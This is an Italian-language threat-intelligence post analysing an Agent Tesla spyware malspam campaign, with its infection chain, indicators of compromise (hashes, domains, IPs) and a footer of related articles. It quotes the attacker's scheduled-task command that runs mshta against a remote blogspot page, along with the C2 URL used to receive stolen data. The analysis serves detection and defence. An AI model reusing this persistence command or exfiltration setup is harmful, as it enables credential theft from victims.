Uncategorized
Published 06/12/2021

Agent Tesla è uno Spyware che, registrando le sequenze di tasti premuti e le azioni dell’utente, esfiltra informazioni dai sistemi vittima.
Questo Spyware è stato creato utilizzando il framework .Net e trasmette i dati personali al server di comando e controllo (C2). Agent Tesla è in grado di accedere alle informazioni salvate nei browser Web, nei client di posta elettronica e nei client FTP.
Il malware è dotato di meccanismi di evasion dell’antivirus e di persistenza sul sistema per ripartire anche a fronte del riavvio del sistema compromesso.

Negli ultimi giorni è stata rilevata una nuova campagna di malspam. La mail invita l’utente a scaricare ed aprire l’allegato.

L’allegato della mail è un file in formato doc che attraverso mshta.exe contatta il dominio https://bitly[.]com/asdqwdwdsfvcxvccv il quale risponde con il seguente file html:

<html>
<head><title>Bitly</title></head>
<body><a href="https://sqlserviceazure.blogspot[.]com/p/bathindasboba[.]html">moved here</a></body>
</html>

Dopo una serie di passaggi viene creato un task schedulato attraverso il comando:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr """"\""""MsHtA""""\""""http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html\""""

Contemporaneamente viene scaricato ed eseguito tramite PowerShell il sample di Agent Tesla. Il quale inizierà a comunicare con il server di comando e controllo attraverso delle POST a http://microsoftazyresql.duckdns.org/j/p29oa/mawa/eae7bc3b675ad7042607.php

Agent Tesla è un keylogger e data-stealer, capace di rubare le credenziali contenute all’interno dei principali Browser, oltre ai dati di configurazione e le credenziali di VPN, FTP e client di posta.

IOC

File DOC:

  • Nome invoice#6317236-booking.com,pdf.doc
  • MD5 d74f268b986fecfa03b81029dd134811
  • SHA1 d49848ac2888e080883a427ef18b406fdcab6b9b
  • SHA256 81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d

Domini:

  • C2
    • microsoftazyresql.duckdns[.]org
    • 103.147.185[.]68
  • Dropper
    • bitly[.]com
    • 67.199.248[.]14

agent teslaexfiltrationmalspammalwarespyware

Related articles

Cyber Security News
March 25, 2026

TeamPCP: The Rise of Cloud-Native Extortion and Supply Chain Attacks

TeamPCP: The Rise of Cloud-Native Extortion and Supply Chain Attacks TeamPCP is […]
supply-chainteampcpthreat
Learn more
Malware Analysis
March 23, 2026

Protected: Matanbuchus – Malware Analysis

There is no excerpt because this is a protected post.
charonmalwarematanbuchusmatanbuchus 3.0ransomware
Learn more
Tactical analysis of Storming Tide criminal campaign infrastructure and data exfiltration techniques - image generated by Google Gemini
DefenceFeatured
March 13, 2026

Operation Storming Tide: A massive multi-stage intrusion campaign

In February 2026, the Fortgale Incident Response team investigated a multi-stage intrusion attributed to Mora_001, a Russian-origin threat actor exploiting Fortinet vulnerabilities. The campaign, internally dubbed "FortiSync Quasar," revealed an evolution from ransomware operations to strategic espionage, deploying Matanbuchus 3.0, Astarion RAT, and SystemBC. Rapid containment prevented any data exfiltration.
EspionageForescoutFortgalefortinetmatanbuchusmora_001ransomwarereportSentinelOnestorming tide
Learn more